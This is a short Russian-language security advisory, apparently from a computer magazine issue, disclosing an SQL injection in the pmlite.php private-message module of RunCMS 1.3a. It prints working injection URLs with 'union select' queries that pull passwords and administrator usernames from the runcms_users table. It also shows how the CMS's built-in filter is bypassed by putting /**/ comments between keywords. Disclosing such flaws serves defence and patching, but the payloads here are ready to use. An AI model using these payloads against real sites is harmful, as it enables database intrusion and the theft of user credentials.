Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в Runcms.
Компьютер для продвинутых
пользователей
Содержание:
RUNCMS
ПО: RUNCMS
Версия: 1.3a
О программе:
Runcms включает в себя множество необходимых веб-мастеры cms форм:
страничку закачки, ссылки, секцию обучения, форумы, новости и т.д.
Возможно управление пользователей через группы с модульно-блоковой с
специфичным способом доступа, расширение функционала с помощью плагинов
и т.д.
Описание:
Отправление личного сообщения.
Следующий URL может использоваться для применения SQL-инъекции в
pmlite.php:
http://localhost/modules/messages/pmlite.php?send=1&to_userid=-1[SQL-INJECTION]
http://localhost/modules/messages/pmlite.php?send=2&to_userid=-1union
select pass from runcms_users
Внутренняя RUNCMS защита заблокирует данный запрос и переадресует вас на
http://localhost/abuse.php и вы увидите следующие сообщение:
" WARNING !!!!!! You were trying to abuse the system, a logfile was
created ..."
В чем же проблема?
Как было проверенно RUNMCS фильтрует все запросы, кроме union
select.
Использование:
http://localhost/modules/messages/pmlite.php?send=2&to_userid=-1/**/union/**/select/**/uname/**/from/**/runcms_users%20where%20level=5/*hamid-network-security-team-http://hamid.ir